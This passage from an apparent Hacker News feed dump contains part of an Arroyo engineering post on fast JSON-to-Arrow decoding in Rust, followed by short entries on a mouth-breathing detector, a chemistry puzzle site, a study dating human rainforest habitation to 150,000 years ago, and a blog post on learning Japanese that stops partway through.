    • bytes: Vec<u8>, a buffer containing raw string data and numeric literals (as we don't have access to the original inputs when it comes time to building the RecordBatch, we have to store the raw data ourselves)
    • offsets: Vec<usize>, a list of offsets into the bytes buffer, pointing to where individual elements begin (and, by looking at the next offset, where they end).

    We also keep a stack of our parse state, as in typical recursive-descent parsing, and use a state machine to drive the parsing process.
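A minimal Rust sketch of these three structures (variant and field names are illustrative; the real arrow-json definitions differ in their details):

/// One entry on the tape. Structural variants store the index of their
/// matching partner; string and number variants index into `offsets`.
enum TapeElement {
    StartObject(u32), // index of the matching EndObject
    EndObject(u32),   // index of the matching StartObject
    StartList(u32),   // index of the matching EndList
    EndList(u32),     // index of the matching StartList
    String(u32),      // index into `offsets` where the string's bytes begin
    Number(u32),      // index into `offsets` where the literal begins
    True,
    False,
    Null,
}

/// The accumulated output of the first pass.
struct Tape {
    elements: Vec<TapeElement>,
    bytes: Vec<u8>,      // raw string/number bytes copied from the input
    offsets: Vec<usize>, // where each element's bytes begin within `bytes`
}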

    To start decoding, we push a Value token onto the parse stack, which indicates we're looking for a valid JSON Value—one of a null, true, or false literal, a string, a number, an array, or an object; these are all distinguishable by looking at a single character. Whichever we find, the corresponding state is pushed onto the stack and on the next iteration of the decode loop we will begin to decode that value.

    To help understand how this proceeds, we'll walk through a few value parsing strategies.

    Strings

    A JSON string starts with a double-quote ", then continues through any valid unicode codepoints until an unescaped closing ". It may also contain special characters and arbitrary unicode via escapes (\b, \f, \n, \r, \t, \\, \", \uXXXX). We search for the next double-quote or backslash (using a SIMD-optimized memchr function), and push those bytes onto our buffer.

    We then look at which byte we matched. If it's a backslash, we move into the escape state, decoding the escaped value and pushing it into our buffer. If it's a double quote, we're done. We push buffer.len() into the offsets list to indicate where this string ends, then a String element onto the tape, along with the second-to-last index of the offset array, which marks the start.

    Lists

    List decoding starts when we encounter a [ token. We push StartList to the tape, then we skip ahead to the next non-whitespace, non-comma token, and check if it's a ]. If so, we're done with the list. We push an EndList to the tape, and update the corresponding StartList to point to the index of the EndList. Otherwise, we begin value parsing for the list element.
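In sketch form, closing out a list looks something like this (names follow the tape description above; start_idx is the remembered tape index of the StartList):

// Push the EndList, then patch the matching StartList (which was
// written with a placeholder) to point at it
let end_idx = tape.len() as u32;
tape.push(TapeElement::EndList(start_idx));
tape[start_idx as usize] = TapeElement::StartList(end_idx);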

    An example

    To see how this works, we can walk through the example of decoding this log line:

    {"ip":"34.127.44.91","identity":"-","user_id":"carmela_enim",
    "timestamp":"2025-02-19T09:15:21.839430-08:00",
    "request":"GET /sbin/early.csv","status_code":401,"size":3833,"referer":"-"}

We start, as always, in the Value state. We find the first token is a {, moving us to the Object state, causing us to push StartObject(MAX_INT) to the tape. Then we encounter the ", moving to the String state. We search for the next " or \, finding a ". We push the bytes between the quotes (ip) to the buffer, push 2 onto the offsets array, and String(0) onto the tape.

    From there we continue through the various parse rules until we reach the }; we push EndObject(1) and update the initial StartObject from the placeholder MAX_INT to point to the end index (18).

    When fully parsed, we end up with the following datastructures:

[Figure: a worked-through example showing the tape datastructure]
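Roughly, the final state looks like this (indices per the walkthrough above; contents truncated for illustration):

// tape element 0 is a null sentinel; 401 lives at tape index 13
tape:    [Null, StartObject(18), String(0) /* "ip" */,
          String(1) /* "34.127.44.91" */, String(2) /* "identity" */,
          ..., Number(11) /* 401 */, ..., EndObject(1)]
bytes:   b"ip34.127.44.91identity-user_idcarmela_enim..."
offsets: [0, 2, 14, 22, 23, 30, 42, ...]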

    Column building

    Once we have the tape built we can perform the second pass, which builds the final columns of Arrow arrays.

    We start by constructing a tree of decoders according to our schema. Each decoder is responsible for implementing a decode function:

    fn decode(&mut self, tape: &Tape<'_>, pos: &[u32])
       -> Result<ArrayData, ArrowError>

    (if you're not familiar with Rust definitions, this is a method, taking a mutable reference to the struct—self in Rust terms, equivalent to Java's this—an immutable reference to the tape datastructure we built previously, and an immutable slice of an array of ints, and returning either an error or ArrayData).

This might look a bit funny—why are we getting an array of positions? This is where the columnar part of this comes in, and much of the performance justification for building up the tape before deserializing. Because we've identified all of the components of the document and we know the schema, we can determine up-front the tape indices of all of the data that will go into a particular array—meaning we can process them all at once, in a tight, efficient loop, needing to downcast the array only a single time.

    What does this look like? In our example, the top-level decoder is a StructArrayDecoder, containing as fields all of the fields of our top-level object:

StructArrayDecoder {
  decoders: [
    StringArrayDecoder { .. },    // ip
    StringArrayDecoder { .. },    // identity
    StringArrayDecoder { .. },    // user_id
    TimestampArrayDecoder { .. }, // timestamp
    StringArrayDecoder { .. },    // request
    PrimitiveArrayDecoder { .. }, // status_code
    PrimitiveArrayDecoder { .. }, // size
    StringArrayDecoder { .. },    // referer
  ]
}

    Struct decoding

Decoding starts by finding all of the tape positions of our top-level value. If this is a primitive value, like a string or a number, this is trivial—every element in our tape will be our primitive.

    In the more common case that this is a struct, we make use of the metadata we stored along with the StartObject tape element—the tape position of the corresponding EndObject element. So to find all of the StartObjects, we can use this simple algorithm:

let mut cur_idx = 1; // tape element 0 is a null sentinel
let mut pos = vec![];

for _ in 0..tape.num_rows() {
    pos.push(cur_idx);

    match tape.elements[cur_idx] {
        TapeElement::StartObject(end_idx) => {
            cur_idx = end_idx + 1;
        }
        TapeElement::Null => {
            cur_idx += 1;
        }
        // ... other top-level element types advance similarly
        _ => unimplemented!(),
    }
}

With our top-level positions found, we can call the decode method for our StructArrayDecoder, which must then find the positions array for each struct field. There are three potential complications here [6]:

    • Expected fields may be missing
    • Additional fields may be present
    • We might have a null literal instead of an object

For each struct position, then, we first determine whether it's an object or Null by querying the tape. If it's Null, we just append that to a null buffer [7] and continue on. If it's an object, we go field-by-field by iterating through every tape element between the object start and object end. Starting at the next element, we read it as a String (if it's not, this is not a valid JSON document—since Object keys must be strings—and we can exit).

    We look up the key in our schema and find the corresponding field, and add the next tape element to its position array, then advance to the next field.

    Once we've found the position arrays for all our fields, we simply pass them into the decode method on each of our child decoders, producing arrays for each, which we can construct into our StructArray according to the Arrow Struct layout.
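A sketch of that field-matching loop for a single object (schema_lookup and tape.next are hypothetical helpers, and null and unknown-field handling is elided):

// Collect, for one object spanning [start_idx, end_idx] on the tape,
// the value positions for each schema field
let mut cur = start_idx + 1; // first element after StartObject
while cur < end_idx {
    let key = match tape.get(cur) {
        TapeElement::String(idx) => tape.get_string(idx),
        _ => return Err(ArrowError::JsonError("object keys must be strings".to_string())),
    };
    let value_pos = cur + 1;
    if let Some(field_idx) = schema_lookup(key) {
        field_positions[field_idx].push(value_pos);
    }
    // skip past the value (a hypothetical helper: one element for
    // scalars, past the matching end element for objects and lists)
    cur = tape.next(value_pos);
}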

    Primitive and String decoding

For non-nested types like primitives (nulls, ints, and floats) and strings, decoding is much simpler. We simply iterate through the positions array, looking up each element in the tape, parsing it as the corresponding Arrow type, and pushing it into our array (which we are able to construct and size up front, since we know how many elements there will be). A bit of complexity creeps in here, as JSON typing can be a bit…loose…in practice. So if we're expecting a number and find a string, we'll attempt to parse it as a number anyways [8].

    If you remember the tape encoding from earlier, there isn't much distinction between strings and numbers—they're both stored as bytes in our buffer, copied directly from the input. The tape element points to an index in our offset array, which then indexes into our buffer. So numeric decoding in either case looks like this:

match tape.get(pos) {
    TapeElement::String(idx) => {
        let s = tape.get_string(idx);
        // P is the primitive type's parser; d names the target data type
        let value = P::parse(s).ok_or_else(|| {
            ArrowError::JsonError(format!("failed to parse \"{s}\" as {d}"))
        })?;

        builder.append_value(value)
    }
    TapeElement::Number(idx) => {
        let s = tape.get_string(idx);
        let value = ParseJsonNumber::parse(s.as_bytes()).ok_or_else(|| {
            ArrowError::JsonError(format!("failed to parse {s} as {d}"))
        })?;

        builder.append_value(value)
    }
    // ... remaining element types
}

    with Tape::get_string implemented something like

fn get_string(&self, idx: u32) -> &str {
    let (start, end) = (self.offsets[idx as usize], self.offsets[idx as usize + 1]);
    // Safety: the bytes were validated as UTF-8 during tape construction
    unsafe { std::str::from_utf8_unchecked(&self.bytes[start..end]) }
}

    Once we've parsed each of our positions, we build and return the final array.

    Streaming extensions

    So that's how the standard arrow-json decoder works. We parse the input text into a flattened tape data structure, find the positions of each row, then build up each Arrow array in one go.

    But for Arroyo, we found we needed a couple of additional features to support streaming data ingestion, as event data is often messier than properly schematized and cleaned batch data.

    Raw JSON

Decoding JSON into Arrow can involve some impedance mismatch: JSON is, by itself, untyped, unschematized, and a pretty much anything-goes sort of data serialization format. Attempts to add structure to JSON—like JSON Schema—end up with incredible complexity, with features like conditionals, pattern properties, and self-modifying schemas. We're never going to be able to support all of that in a relatively rigid type system like Arrow. In other cases, the data fundamentally does not follow a schema, like an unstructured “properties” field.

    So sometimes you just need an escape hatch, the ability to throw up your hands and say, sure, just give us whatever you got. In Arroyo, we call that raw JSON—a special Arrow extension type that will accept any valid JSON value and store it as an encoded string.

How do we efficiently decode arbitrary JSON into a string? The tape decoding approach actually makes this quite simple. In each case, we are building up a string. We have a few cases to handle depending on what kind of TapeElement we find (sketched in code after this list):

    • Literals (true/false/null): we write that literal to the string
    • Strings: we push ", followed by the contents of the buffer corresponding to the string, followed by "
    • Numbers: we push the contents of the buffer corresponding to that number
    • Lists: we push [, then go element by element, recursively calling our decode method, pushing , (except for the last one), then ]
• Objects: we first push {, then go two elements at a time, decoding the key, pushing :, then decoding the value, pushing , (except after the last pair), then }
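Sketched in code, the recursive re-encoding might look like this (not Arroyo's actual code; tape.next is the same hypothetical value-skipping helper as above, and re-escaping of string contents is omitted for brevity):

fn write_value(tape: &Tape<'_>, pos: u32, out: &mut String) {
    match tape.get(pos) {
        TapeElement::True => out.push_str("true"),
        TapeElement::False => out.push_str("false"),
        TapeElement::Null => out.push_str("null"),
        TapeElement::String(idx) => {
            out.push('"');
            out.push_str(tape.get_string(idx));
            out.push('"');
        }
        TapeElement::Number(idx) => out.push_str(tape.get_string(idx)),
        TapeElement::StartList(end) => {
            out.push('[');
            let mut cur = pos + 1;
            while cur < end {
                write_value(tape, cur, out);
                cur = tape.next(cur);
                if cur < end {
                    out.push(',');
                }
            }
            out.push(']');
        }
        TapeElement::StartObject(end) => {
            out.push('{');
            let mut cur = pos + 1;
            while cur < end {
                write_value(tape, cur, out); // key
                out.push(':');
                cur = tape.next(cur);
                write_value(tape, cur, out); // value
                cur = tape.next(cur);
                if cur < end {
                    out.push(',');
                }
            }
            out.push('}');
        }
        _ => unreachable!("end elements are skipped by tape.next"),
    }
}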

    Once we've reached the end of the element we end up with a compact representation of the original JSON (notably missing the original whitespace, which is lost during the tape building process).

    Invalid data handling

A reality of JSON data pipelines is that the JSON in them is not always exactly as it's supposed to be. Some application adds a field, emits a new type of event, or drops a required field, and now there's bad data in our Kafka topic. So Arroyo, like other streaming engines, offers a “bad data” handling setting that allows users to ignore incorrect data rather than failing the pipeline.

For row-based decoding this is trivial to implement—you try to decode a row, and if that fails you just move on. As an application, you don't need any special support from the decoder. But for columnar decoding, we process an entire batch of records at once, and a single bad document will cause us to lose the entire batch. Adding in the ability to handle fine-grained errors requires modifying the decoder itself.

    We'll consider two ways our input JSON might be invalid, corresponding to our two passes. The first is if the JSON fails to parse—for example, there's a { without a corresponding }, an unterminated string, or an illegal escape sequence. These errors we handle when passing bytes to the TapeDecoder. For example, if we start parsing an object we expect to find the next character is a "—if it's not we'll return an error.

    {
      "ip": "131.62.139.111,
      "identity": "-"
    }

    Once an error has occurred, we roll back the state of the tape to where it was when we started parsing the current record. This requires storing the indices of our three arrays when we start each new record, and unwinding the stack.
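A sketch of that checkpointing (names are assumed; a checkpoint is captured as each new record begins):

// Lengths of the decoder's buffers at the start of the current record
struct Checkpoint {
    tape_len: usize,
    bytes_len: usize,
    offsets_len: usize,
    stack_len: usize,
}

impl TapeDecoder {
    // On a parse error, discard everything the bad record wrote
    fn rollback(&mut self, cp: &Checkpoint) {
        self.tape.truncate(cp.tape_len);
        self.bytes.truncate(cp.bytes_len);
        self.offsets.truncate(cp.offsets_len);
        self.stack.truncate(cp.stack_len);
    }
}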

The second type of error occurs when we receive valid JSON which mismatches the schema. How strict we are about validation is configurable (users can choose to allow extra fields, to coerce primitives, and to mark fields as nullable), but there are some errors that will always fail decoding, like incorrect and un-coercible types:

    {
      "ip": "131.62.139.111",
      ...
      "size": "pretty big"
    }

    The columnar decoding strategy makes handling schema errors harder. In this example, we don't know the record is bad until we get to the final column, at which point we've already built all of the other columns. We can't merely skip it at this point, because that will lead to different columns being misaligned (we could mark it null, assuming the column is nullable, but that has different and undesirable semantics).

We really need to know which rows are invalid before we start constructing any of our columns. Our solution was to add an additional method to each decoder:

    fn validate_row(&self, tape: &Tape<'_>, pos: u32) -> bool

    This method should follow the validation logic in the actual decoder, returning true for valid rows and false for invalid ones.

    Before decoding a batch, we then call this for our root decoder with each position, determining which rows are good and which are invalid. We filter out any bad rows from our positions array, and proceed to decode with the good rows. If desired we can also return the bad JSON (possibly for logging or reporting to the user) by using the raw JSON decoder described above.
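Putting the validation pass together might look like this sketch (names assumed):

// Keep only the positions whose rows pass validation, remembering the
// rejects so they can be surfaced via the raw JSON decoder
let (valid, invalid): (Vec<u32>, Vec<u32>) = positions
    .iter()
    .copied()
    .partition(|&pos| root_decoder.validate_row(&tape, pos));

let batch = root_decoder.decode(&tape, &valid)?;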

    Wrapping up

So that is how Arroyo deserializes JSON into Arrow arrays. As discussed at the beginning, this is quite fast, but there are still many possible performance improvements. While writing this post, I spent some time profiling and optimizing the tape decoder and found a 30-40% performance improvement.

    That PR added SIMD optimizations to a couple of operations (finding string ends and UTF-8 validation), but most of the input processing work is still done in a scalar manner. There's also room to eliminate the CPU spent building the string buffer by using the input data directly as in simdjson (albeit at the cost of extra memory usage).

    The array-building pass is already quite efficient so long as our data is dense. In cases where we have many fields that are null (possibly to express an enum) we pay the cost of filling in all of those fields (and subfields, if they are objects) with null values.


    1. https://dl.acm.org/doi/10.14778/3236187.3236207

2. Some may interject at this point that the real solution is to stop using JSON for your data pipelines. Other formats like Protobuf or Avro can be deserialized much faster, and are schematized to prevent bad data. But you try telling the 1000 developers at your company that they should spend a quarter on data format migrations.

    3. Columnar formats like Arrow store data as arrays of columns (for example, every user_id field will be stored together) rather than rows (storing the user_id, created_at, name, etc. fields for a single user together). They have many advantages for analytical processing.

    4. simdjson has a lot of other tricks up its sleeves to get its outrageous performance, as detailed in this highly-readable VLDB paper

    5. This is significantly more complex than it sounds, because structural tokens may be contained within quotes—in which case they're no longer structural—but quotes may also be escaped.

6. If all fields are non-nullable and we're operating in “strict” mode where additional fields are not allowed, we could just compute the fixed offsets directly (e.g. every field congruent to 1 mod 8 is identity).

    7. Arrow uses a dedicated bitmap, the “null” or “validity” buffer, to indicate whether the corresponding element in the data buffer is null; this allows us to store, for example, primitive ints without needing to reserve a special null value.

    8. In fact, because many JSON encoders use JavaScript numeric types and lack support for full 64-bit integers, string encoding is the only reliable way to pass large numbers around

    ]]>
    https://www.arroyo.dev/blog/fast-arrow-json-decoding hacker-news-small-sites-43199060 Thu, 27 Feb 2025 22:07:30 GMT
    <![CDATA[Show HN: Get pinged when you are mouth breathing]]> thread link) | @mark_mcnally_je
    February 27, 2025 | https://mcnally.je/breath/ | archive.org

    The Ancient Ritual:

    1. Activate the Scrying Mirror with the "Commence Scrying" incantation
    2. The enchanted glass will track thy visage and detect if thy mouth betrays thee
    3. For the first 10 seconds, breathe normally through thy nose to calibrate the mirror
    4. The oracle shall provide immediate counsel on thy breathing patterns
    5. The ancient scrolls will record the percentage of time spent in improper form

    Heed this wisdom: Enable Auto-Calibration to establish thy natural breathing baseline during the first 10 seconds. The observer will automatically set an optimal threshold based on thy normal nose breathing pattern. Alternatively, manually adjust the sensitivity slider to control exactly how many pixels of lip separation are allowed (with sub-pixel accuracy).

    ]]>
    https://mcnally.je/breath/ hacker-news-small-sites-43198952 Thu, 27 Feb 2025 21:56:16 GMT
    <![CDATA[Chemdle]]> thread link) | @eden-u4
    February 27, 2025 | https://chemdle.com/chemdles | archive.org

    Curated daily organic chemistry problems!

    ]]>
    https://chemdle.com/chemdles hacker-news-small-sites-43198795 Thu, 27 Feb 2025 21:39:40 GMT
    <![CDATA[Evidence that our ancestors lived in rainforests 150k years ago]]> thread link) | @gmays
    February 27, 2025 | https://www.sheffield.ac.uk/news/scientists-find-earliest-evidence-our-ancestors-lived-rainforests-150000-years-ago | archive.org

    The earliest evidence of humans living in tropical rainforests in Africa, around 150,000 years ago, has been published in a new study in Nature by researchers at the University of Sheffield.

    • A new study published in Nature provides the earliest evidence that our human ancestors lived in the tropical rainforests of Africa
    • The study involving University of Sheffield researchers dates humans living in rainforests back to 150,000 years ago, 80,000 years earlier than found in other rainforests sites around the world
    • Luminescence and Electron Spin Resonance dating techniques were used to date sediments containing Middle Stone Age tools found at an archeological site in Côte d'Ivoire, Africa, to a time when tropical rainforests existed across the region
    • The study argues that tropical rainforests were not a barrier to the spread of modern humans and supports the theory that human evolution happened across a variety of regions and habitats.


Humans were thought not to have lived in rainforests until relatively recently, as rainforests were considered natural barriers to human habitation.

    However the new study - published by an international team led by the Max Planck Institute of Geoanthropology, with contributions from the University of Sheffield - found that humans were living in rainforests within the present-day Côte d'Ivoire around 150,000 years ago.

    The study puts the evidence for humans living in rainforests anywhere in the world, back by 80,000 years, and argues that human evolution happened across a variety of regions and habitats.

    The team re-excavated an archaeological site from the 1980s currently found within rainforest, in which stone tools had previously been found deep within sediments but could not be dated. They then applied new scientific methods to the site which were not available during the original study.

    Ancient pollen, silicified plant remains (phytoliths) and leaf wax isotopes from site sediments were also analysed and found to indicate that when humans were dropping their stone tools in the region, it was a heavily wooded wet forest, typical of humid West African rainforests.

Professor Mark Bateman, from the University of Sheffield’s School of Geography and Planning, used a dating technique called Optically Stimulated Luminescence to discover the burial age of individual grains of sand from eight samples throughout the site. His work showed that the archaeological site extended back from 12,000 years ago right through to around 150,000 years ago. These results were then corroborated by Electron Spin Resonance dating.

    Professor Bateman, said: “The stone tools found at the site were thought to be from the Middle Stone Age, so they could have been as old as 500,000 years, or as young as 10,000 years.

    “Key to finding when they were being used was the application of modern dating techniques to the sediments in which the stone tools were found.

    “It is incredibly interesting to take a grain of ancient sand and be the first to know when it was deposited. It is even more so when the age of the sand changes what we know of how, and where, our ancient ancestors lived.”

    Lead author of the study, Dr. Eslem Ben Arous from the National Centre for Human Evolution Research (CENIEH), said: “Before our study, the oldest secure evidence for habitation in African rainforests was around 18,000 years ago, and the oldest evidence of rainforest habitation anywhere came from southeast Asia at about 70,000 years ago.” 

    “This pushes back the oldest known evidence of humans in rainforests by more than double the previously known estimate.”

    Professor Eleanor Scerri, senior author of the study and leader of the Human Palaeosystems research group at the Max Planck Institute of Geoanthropology, said:  “Several recent climate models suggested the area could have been a rainforest refuge in the past as well, even during dry periods of forest fragmentation. So we knew the site presented the best possible chance for us to find out how far back into the past rainforest habitation extended.

    “This work reflects a complex history of population subdivision, in which different populations lived in different regions and habitat types. 

    “We now need to ask how these early human niche expansions impacted the plants and animals that shared the same niche-space with humans. In other words, how far back does human alteration of pristine natural habitats go?”

    Professor Bateman, added: “There are other sites waiting to be investigated that could provide equally as exciting results. However this study was completed just before the site was destroyed by mining activity, highlighting that being able to do work such as this is vitally important in being able to further study the history and evolution of the human species.”


    ]]>
    https://www.sheffield.ac.uk/news/scientists-find-earliest-evidence-our-ancestors-lived-rainforests-150000-years-ago hacker-news-small-sites-43198678 Thu, 27 Feb 2025 21:24:50 GMT
    <![CDATA[How I’m Learning Japanese 14 Days In]]> thread link) | @ingve
    February 27, 2025 | https://wavelengths.online/posts/how-im-learning-japanese-14-days-in | archive.org

    I’ve tried to learn Japanese a few times over the years, the earliest attempt at which was some time in high school while I was watching an episode of Fullmetal Alchemist and casually looked up how long it would take.

    I quit as soon as I’d decided to start.

    Years later I was hosting a weekly recap podcast about a Japanese reality show called Terrace House with my friend and thought “it’s silly for me to be talking about this show every week without understanding any Japanese. I need to learn.”

    ↑ Excerpt ↑

    I — an idiot — did almost no research and didn’t ask anybody for help which resulted in buying a textbook called Genki and downloading Duolingo. While Genki is widely used and recommended by many, I found that trying to dive headfirst into it with no assistance and no additional study materials was Decidedly Not the way I was going to learn Japanese and focused all of my time on Duolingo instead. My commutes to and from work each day consisted of about four total hours of train rides, which when focused on cramming as many Duolingo lessons as possible made for a pretty solid amount of study time — though I was unaware of how poor Duolingo would be as a single tool for learning Japanese. I dropped the habit eventually as work became more and more overwhelming and the idea of spending two hours shoving a new language into my skull, then working a high intensity job for eight (but usually more) hours, then spending two more hours in Duolingo on the way home was a really cool way to burn out. 

    Fast forward to two weeks ago and my partner and I had finally decided that we’d spend our honeymoon in Japan at some point this year and the desire to learn popped up again, this time with both of us learning simultaneously. It’s easier to stay committed to a habit when you have a buddy. I did a ton of research, consulted with a few friends who learned the language in a variety of ways, and tried every method and resource I could find before landing on some tools that really do the trick.

    We’ve now both been studying for about two weeks and have made significantly more progress in those two weeks than I did in the months of daily four-hour commuting study via Duolingo years ago, so I thought as a way to share some resources and hold myself accountable I’d write up a post about how to start learning when you know literally nothing. It’s worth mentioning once again: I’m only two weeks into this. My advice may change, I may find new tools and resources, and I may bail from others. If there’s enough interest, I’ll keep this up as a series or update this post over time.

    A note: Sorry to the Android users among you, but as an iOS user some of the apps I recommend will be iOS only. I’ll link to Android versions when possible or other recommended apps if I find them.

    Step One: Learn Hiragana and Katakana

    The first part of learning Japanese is both easy and difficult in equal measure. Easy because it involves a simple step, which is to learn two of the three “alphabets” used in the language which will lay the foundation for the rest of the journey and enable you to understand and utilize more advanced study materials down the line. Difficult because it really comes down to rote memorization and repetition which can be boring or difficult to motivate yourself to do.

    For context: Hiragana and katakana are two sides of the same coin, in that they each contain 46 basic characters that represent the phonetic sounds used in spoken Japanese language. Unlike English where the letter “a” can be used to make a multitude of sounds when found within a word, the hiragana and katakana “a” — あ and ア — pretty much always make the “ah” sound as found in the word “car.” Hiragana is used for most words that originate from Japanese, while katakana is used for “loan words” or words that have been adopted into Japanese but may come from other origins. For example ステーキ is pronounced “su-te-ki” which sounds an awful lot like “steak” and in fact just means “steak” because it’s an English word adapted into Japanese. Fun!

    This means all you need to do for step one is learn the characters and there are a lot of ways to do that depending on how quickly you want to get it done and how you learn best. Duolingo has a great tool for learning these, though the process was much too slow for me. On my end I used the following resources: 

    Learn Hiragana in One Hour

    I recommend watching this video in two thirty minute sessions and breaking out a pen and paper to write the characters down as the host introduces them. People with big brains agree: Writing helps memory. It can be overwhelming, but the mnemonic devices are extremely helpful for this early phase where characters look so wildly different from the English alphabet. It won’t take long for them to become second nature — the mnemonics fade away. Also: Make sure you repeat after Risa out loud to make sure you’re matching the intonation. As the hiragana are the most foundational element of the language learning process, any bad habits here could cause issues down the line. 

    A fun trick I’ve seen a lot of people shout out is tracing the characters with your finger on your other hand if you don’t have a pen and paper present. The order in which you draw each stroke of a character is important, so practicing any way you can is great — even if it’s just on your hand.

    Benkyō (iOS)

    Benkyō is one of a few apps by developer Romain Pellen designed to drill and memorize concepts from the Japanese language via flash cards using a spaced repetition system (SRS). SRS tools basically exist to introduce concepts, then reintroduce them at repeated intervals with the intention of burning them into your long term memory. A character you get right today will appear again in two or three days, while a character you frequently get wrong will appear more often. People Online™ are obsessed with SRS apps. While I found the setup process of Benkyō to be a bit cumbersome — some truly confusing menus in this thing — once I got the hang of it, I found myself crushing the entire hiragana chart within the first two days of study by quizzing myself with the Smart Quiz feature every chance I had. Let me be clear: That pace is not necessary. It’s all dependent on your personal goals here, and mine was to move past this foundational element within my first week if possible. 

    Benkyō is wonderful in that it will continue to scale up with you over time as it includes katakana, common vocabulary, and kanji — the third and most daunting written system used in Japan. Assume from here on out that I’m also using Benkyō for these things in between everything else I recommend. For the Android users among you, check out Dr. Moku.

    TokiniAndy’s Guide to Hiragana and Katakana

This video will walk you through the katakana and the hiragana simultaneously, which is great for reinforcing what you’ve learned about hiragana while acclimating you to the katakana side of things. Thankfully, because the sounds and modifiers are almost exactly the same, learning the basic set of katakana after the entire hiragana set will allow you to intuitively suss out the more complex katakana pairings and rules — it’s a nice boon for motivation whenever you can set yourself up to say “Oh! I know this already!” Just like the above video, I recommend writing and speaking along to really hammer this stuff in before moving back to Benkyō and introducing the flash cards for katakana.

    Learning both character sets to the point where I have no trouble recognizing them took me about four days of fitting study in around podcasting and my day job and wedding planning and everything else life has to offer. That pace felt a bit breakneck to the point where I was mentally exhausted every night before bed, but worth it to jump to the next piece of the puzzle — and the one that will hypothetically take forever.

    Step Two: Draw the Rest of the Fucking Owl

    So there are about one million different ways to go from here, and because every person is different it means you’ll need to try a few different things to get going. Many people say the first step of learning Japanese is to learn how to learn Japanese, and I’d say that’s almost correct. The first step, once again, is to learn hiragana and katakana… second is learning how to learn Japanese.

    The reason things get so wild here is that people will say that you need to start learning kanji, vocab, and grammar simultaneously and it’s not not true. Learning even the most basic grammar helps make sense of sentence structure, which enables you to discern kanji and vocab words in the context of real written language. Conversely, the more kanji and vocab you learn the easier it will become to intuitively parse new grammatical rules as they’re introduced.

    While some all-in-one resources exist here, they generally cost a pretty decent chunk of cash. My first bit of advice before I get into what I’m personally using is to figure out which tools and what pace you can stick with. Take advice from 2017 daily-four-hour-Duolingo Brendon: Don’t burn out and don’t go all-in on a single resource. Building strong foundational habits here is key for long term success. I’ve only been learning Japanese in earnest for about two weeks, but I’ve been doing things like podcasting every week for years and years and the same principle applies to pretty much every long-term endeavor. This means balancing what you want to accomplish with what you need to maintain a healthy life — so rest often!! Progress is progress, and sometimes forgetting a word you thought you knew yesterday is also progress. Learning is weird! 

    Duolingo

    Surprise! I’m still using Duolingo! Look, it has its fair share of problems, but doing a Duolingo lesson or two every day is better than doing nothing and teaches a few helpful vocab words and grammar points here and there. I’ve had a few instances where my brief daily time in Duolingo actually helped me get a head start in the apps and platforms people recommend instead of Duolingo. There’s a lot of reasonable and unreasonable hate directed at Duolingo’s Japanese course these days. A lot of the prevailing negativity stems from people who tried it years ago and bounced off because it was slow, boring, and sometimes flat-out incorrect. Those early years of a sub-par lesson plan have laid the groundwork for thousands of posts writing the app off entirely sight unseen. Thankfully the Japanese course has undergone a huge overhaul in recent years, and I find myself generally enjoying it in very limited spurts.

    The biggest detractor is how little it teaches from a comprehension perspective and how brutally long it takes to move between units. Japanese is a super contextual language, meaning words and phrases will mean different things and can be shortened and elongated depending on the context of the conversation. Duolingo doesn’t really provide this outside of a “listening practice” lesson every few units. Polite forms and casual forms are mostly glossed over here, and grammar points pop up infrequently enough that you could be cruising through lessons without understanding why you’re saying the things you’re saying in the order you’re saying them. I’m not crushing four hours of lessons a day like I used to, and that’s because my time is better spent elsewhere — but that doesn’t mean Duolingo is as useless as many people online will tell you. Feel it out, but don’t rely on it.

    WaniKani via Tsurukame

    WaniKani seems to be most people’s favorite way of learning the kanji. There are something like 40,000 kanji which is horrifically daunting until you learn that most Japanese people are only taught around 2-3,000 in school for use in daily life. If you’re reading this as a native English speaker, you statistically know around 20,000-30,000 words — helpful perspective! You can learn 10% of those in another language, I believe in you.

    The closest thing to a cheat code you’ll get with kanji is that while it’s possible to brute-force memorize them the way you did with the hiragana and katakana, each kanji character is made up of smaller pieces called “radicals” which can also be learned separately. By learning the meanings of these radicals as the foundational element of your kanji journey, you’ll be able to infer the meaning of kanji over time. This is the core concept behind WaniKani, a flashcard system which teaches the radicals first before building on top of them to lead you into the 2,000 most commonly used characters and 6,000 vocabulary words over time. A friend who taught himself Japanese told me that WaniKani was the reason he “never had a problem” with kanji and I’m starting to see why. As of today I’ve been doing my WaniKani lessons and reviews daily and feel like I’m actually starting to get a handle on the learning process thanks to the way it casually layers helpful mnemonic stories atop each kanji. Just like the hiragana and katakana, you’ll see a kanji like 上 and spend the first few days reciting the mnemonic device in your head to lead you to the answer (in this case: the kanji means “above” and looks like “Joe’s toe sticking out above the ground,” so you know to pronounce it as じょう or “jo-o”), eventually you get to the point where the mnemonic identification phase disappears on a per-kanji basis.

    One note here is that the process takes an extremely long time as the service doles out lessons and reviews over the course of a year+ with no way to speed the process up. Every single day you’ll only be given a handful of new characters and quizzes, and while it might feel like the pace is too slow at the beginning I can already see the brilliance in how they teach their users based on the words and kanji I’ve already learned. I can tell I have a strong foundation for long-term learning based on the progress I’ve already made.

    WaniKani can be accessed via the web, but I use a third party iOS app called Tsurukame to access my lessons. Android users recommend an app called Smouldering Durtles these days. The first few levels are free which will take around a month to complete, and the service then costs $10 a month or $90 a year to access the rest. 


    BunPro

Grammar is obviously a huge part of understanding any language, and learning Japanese while coming from English can feel wild because the structure of sentences frequently seems completely backwards. From what I’ve read, the biggest trap any prospective Japanese speaker can fall into is trying to assemble the language as a math problem, when the best way to learn for long-term success is to first become aware of the rules, then almost passively watch them play out enough that they come subconsciously while you speak and read Japanese.

    A frequently recommended resource for grammar is called Tae Kim’s Guide which is a free e-book available online, but reads very much like a textbook and requires a lot of undirected study to make your way through. BunPro on the other hand teaches similar concepts using the same SRS method as Benkyō and WaniKani, meaning each day can be spent opening your apps and learning new concepts across the spectrum of the language and reviewing old concepts as directed. 

    My experience with BunPro has been mixed so far in that while I love learning grammar and find it legitimately interesting, I don’t love the way BunPro teaches vocab. Unfortunately, both are necessary to progress through their prebuilt course and I find myself frequently understanding new grammatical rules immediately but get tripped up when the app instead quizzes me on vocab I’d glossed over. My two pieces of advice are as follows:

    1. Do not neglect the vocab side of BunPro as I did as it’s not a tenable way to interact with the service — once again I was led astray by internet strangers I shouldn’t have trusted.

    2. Go into the settings and tone down the daily new vocab words from 10 to 5. Between WaniKani, Duolingo, and some of the other study materials I’m using, adding 10 more vocab words to the mix via BunPro was the thing that would have burnt me out again.

    Anki

